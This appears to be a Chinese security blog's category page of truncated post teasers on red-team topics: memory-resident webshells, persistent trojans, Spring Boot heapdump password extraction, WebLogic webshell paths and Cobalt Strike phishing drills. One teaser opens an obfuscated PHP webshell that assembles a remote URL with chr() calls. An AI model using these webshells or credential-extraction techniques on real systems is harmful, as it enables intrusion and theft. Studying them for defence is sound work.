随笔分类 - Web安全
严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !
摘要:一、概述 一文看懂内存马概述:内存马是无文件攻击的一种常用手段,随着攻防演练热度越来越高:攻防双方的博弈,流量分析、EDR等专业安全设备被蓝方广泛使用,传统的文件上传的webshll或以文件形式驻留的后门越来越容易被检测到,内存马使用越来越多。 Webshell内存马,是在内存中写入恶意后门和木马并
阅读全文
摘要:
阅读全文
摘要:
阅读全文
摘要:
阅读全文
摘要:
阅读全文
摘要:
阅读全文
摘要:
阅读全文
摘要:说明 攻防linux系统运行的🐎会自动掉线,用nohup会在后台运行,关闭终端,nohup运行的程序也不会关闭 命令 nohup ./🐎(运行命令) & //除非kill才能关闭进程 排查 网络连接动态实时监测 netstat -antplc > 1.txt linux查看网络链接状况命令 ne
阅读全文
摘要:
阅读全文
摘要:简介 2022/3/17日更新 PCwx小程序被加密,需要先解包生成.wxapkg pc_wxapkg_decrypt_python python生成 路径\WeChatFiles\Applet\小程序id\__APP__.wxapkg python解密工具 python main.py --wxi
阅读全文
摘要:
阅读全文
摘要:背景介绍 企业一般为了提升员工的安全意识,一般会进行钓鱼应急演练,简单实现方式如下: 1、钓鱼邮件,制作免杀远控木马,附件中为exe远控木马(有一定风险) 2、钓鱼邮件,制作钓鱼网站,邮件正文存在钓鱼链接(风险可控) 本文主要是为了解决cobaltstrike无法直接克隆HTTPS网站,所以用wge
阅读全文
摘要:springboot heapdump含有数据库账户密码,利用memoryAnalyzer内存分析工具即可提取口令信息,步骤详情如下 MemoryAnalyzer 1、打开heapdump包后点击QQL输入查询语句,点击红色叹号搜索password字段 根据springboot泄露的env接口信息,
阅读全文
摘要:路径一 /u01/oracle/wlserver/server/lib/consoleapp/webapp/images/shell.jsp http://ip:7001/console/images/shell.jsp 路径二 weblogic网站根目录——及2款exp工具 参考连接 weblog
阅读全文
摘要:影响范围 Windows Server, version 20H2 (Server Core Installation) Windows Server, version 2004 (Server Core installation) Windows Server 2022 (Server Core
阅读全文
摘要:<?php $password='lshh';$b="chr"; session_start(); if(empty($_SESSION['PhpCode'])){ $d=$b(104).$b(116).$b(116).$b(112).$b(58).$b(47).$b(47).$b(57).$b(5
阅读全文
摘要:关于Swagger-UI下的渗透实战
阅读全文